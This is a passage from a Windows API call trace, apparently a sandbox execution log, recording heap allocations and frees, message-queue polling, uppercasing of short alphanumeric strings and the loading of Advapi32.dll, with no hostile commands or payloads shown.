hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0088.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0088.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0088.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0088.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.325] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.325] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0088.325] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0088.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.325] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0088.326] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0088.326] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0088.326] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.326] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0088.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.326] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0088.327] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0088.327] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0088.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0088.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0088.328] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0088.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.328] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.329] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.329] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.329] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0088.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0088.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0088.330] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0088.330] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0088.330] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0088.330] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0088.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0088.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0088.331] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.331] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0088.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0088.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0088.331] HeapFree (in: hHeap=0x2af0000, 